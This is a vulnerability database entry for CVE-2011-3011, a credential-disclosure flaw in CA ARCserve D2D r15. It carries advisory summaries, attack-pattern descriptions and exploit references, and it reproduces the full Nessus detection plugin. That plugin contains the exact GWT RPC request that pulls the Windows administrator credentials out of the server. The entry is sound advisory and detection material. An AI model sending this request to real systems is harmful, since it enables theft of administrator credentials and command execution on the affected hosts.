Vulnerabilities > CVE-2011-3011 - Information Exposure vulnerability in CA Arcserve D2D R15

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
ca
CWE-200
nessus
exploit available
metasploit
NVD
Published: 2011-08-15
Updated: 2023-11-07

Summary

BaseServiceImpl.class in CA ARCserve D2D r15 does not properly handle sessions, which allows remote attackers to obtain credentials, and consequently execute arbitrary commands, via unspecified vectors.

Vulnerable Configurations

Part Description Count
Application
Ca
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

D2sec

nameCA ARCserve D2D r15 Credentials Disclosure
urlhttp://www.d2sec.com/exploits/ca_arcserve_d2d_r15_credentials_disclosure.html

Exploit-Db

descriptionCA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit). CVE-2011-3011. Local exploit for Windows platform
idEDB-ID:41707
last seen2017-03-23
modified2017-03-23
published2017-03-23
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/41707/
titleCA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)

Metasploit

descriptionThis module exploits an information disclosure vulnerability in the CA Arcserve D2D r15 web server. The information disclosure can be triggered by sending a specially crafted RPC request to the homepage servlet. This causes CA Arcserve to disclosure the username and password in cleartext used for authentication. This username and password pair are Windows credentials with Administrator access.
idMSF:EXPLOIT/WINDOWS/HTTP/CA_ARCSERVE_RPC_AUTHBYPASS
last seen2020-05-21
modified2017-07-24
published2011-08-01
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3011
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
titleCA Arcserve D2D GWT RPC Credential Information Disclosure

Nessus

NASL familyCGI abuses
NASL idARCSERVE_D2D_HOMEPAGESERVLET_INFO.NASL
descriptionThe installed version of ARCserve D2D, a disk-based backup product from Computer Associates, allows an unauthenticated, remote attacker to discover the username and password used by the affected application. This can be accomplished by sending a specially crafted POST request to the
last seen2020-06-01
modified2020-06-02
plugin id55720
published2011-07-28
reporterThis script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/55720
titleComputer Associates ARCserve D2D homepageServlet Servlet Information Disclosure
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(55720);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/15 20:50:16");

  script_cve_id("CVE-2011-3011");
  script_bugtraq_id(48897);
  script_xref(name:"EDB-ID", value:"17574");
  script_xref(name:"EDB-ID", value:"17594");

  script_name(english:"Computer Associates ARCserve D2D homepageServlet Servlet Information Disclosure");
  script_summary(english:"Tries to exploit the vulnerability to discover admin credentials");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server hosts a Java servlet that is affected by an
information disclosure vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The installed version of ARCserve D2D, a disk-based backup product
from Computer Associates, allows an unauthenticated, remote attacker
to discover the username and password used by the affected
application.  This can be accomplished by sending a specially crafted
POST request to the 'homepageServlet' servlet that contains the
getLocalHost message as well as the name of the Google Web Toolkit
Procedure Call (GWT RPC) descriptor.

Note that these are credentials for the Windows user with
Administrator privileges supplied during the ARCserve install process.

Note also that an attacker reportedly can use these credentials to
gain access to the application and run arbitrary commands with the
associated privileges on the affected host by, for example,
configuring a command to run before a backup is started and then
starting a backup."
  );
  # http://web.archive.org/web/20111005000321/http://retrogod.altervista.org/9sg_ca_d2dii.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?13ae8740");
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.securityfocus.com/archive/1/518983/30/0/threaded"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.securityfocus.com/archive/1/519002/30/0/threaded"
  );
  # https://support.ca.com/us/download-center/solution-detail.html?aparNo=RO33517&os=WINDOWS&actionID=3
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?b67c794a"
  );
  script_set_attribute(attribute:"solution", value:"Apply the RO33517 fix.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"CA ARCserve D2D r15 Credentials Disclosure");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'CA Arcserve D2D GWT RPC Credential Information Disclosure');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'White_Phosphorus');

  script_set_attribute(attribute:"vuln_publication_date", value:"2011/07/26");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/08/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/07/28");

  script_set_attribute(attribute:"plugin_type", value:"remote");

  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("arcserve_d2d_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/arcserve_d2d");
  script_require_ports("Services/www", 8014);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

port = get_http_port(default:8014);


install = get_install_from_kb(appname:'arcserve_d2d', port:port, exit_on_fail:TRUE);
dir = install['dir'];
install_url = build_url(port:port, qs:dir);


# Try to exploit the issue.
fields = make_list(
  "5",
  "0",
  "4",
  "http://"+get_host_name()+":"+port+dir+"/contents/",
  "2C6B33BED38F825C48AE73C093241510",
  "com.ca.arcflash.ui.client.homepage.HomepageService",
  "getLocalHost",
  "1",
  "2",
  "3",
  "4",
  "0",
  ""
);
postdata = join(fields, sep:'|');
url = dir + '/contents/service/homepage';

req = http_mk_post_req(
  port        : port,
  item        : url,
  add_headers : make_array(
                  'Content-Type', 'text/x-gwt-rpc; charset=utf-8',
                  'Cookie', 'donotshowgettingstarted=%7B%22state%22%3Atrue%7D'
                ),
  data        : postdata
);
res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE);


# If the response looks correct...
if (
  '//OK[' >< res[2] &&
  'com.ca.arcflash.ui.client.model.TrustHostModel' >< res[2] &&
  ',"user",' >< res[2] &&
  ',"password",' >< res[2]
)
{
  # Make sure we actually got the credentials.
  user = "";
  match = eregmatch(pattern:'"user","([^"]+)",', string:res[2]);
  if (!isnull(match)) user = match[1];

  pass = "";
  match = eregmatch(pattern:'"password","([^"]+)",', string:res[2]);
  if (!isnull(match))
  {
    pass = match[1];
    # nb: mask actual password except for first and last characters.
    pass = strcat(pass[0], crap(data:'*', length:6), pass[strlen(pass)-1]);
  }

  if (user && pass)
  {
    if (report_verbosity > 0)
    {
      req_str = http_mk_buffer_from_req(req:req);

      report = '\n' +
        'Nessus was able to exploit the vulnerability to gather the credentials\n' +
        'of the ARCserve D2D install using the following request :\n' +
        '\n' +
        crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
        req_str + '\n' +
        crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
      if (report_verbosity > 1)
      {
        report += '\n' +
          '\n  Username : ' + data_protection::sanitize_user_enum(users:user) +
          '\n  Password : ' + pass +
          '\n' +
          '\nNote that the password displayed here has been partially obfuscated.\n';
      }
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
  }
}

exit(0, "The ARCserve D2D service at "+install_url+" is not affected.");

References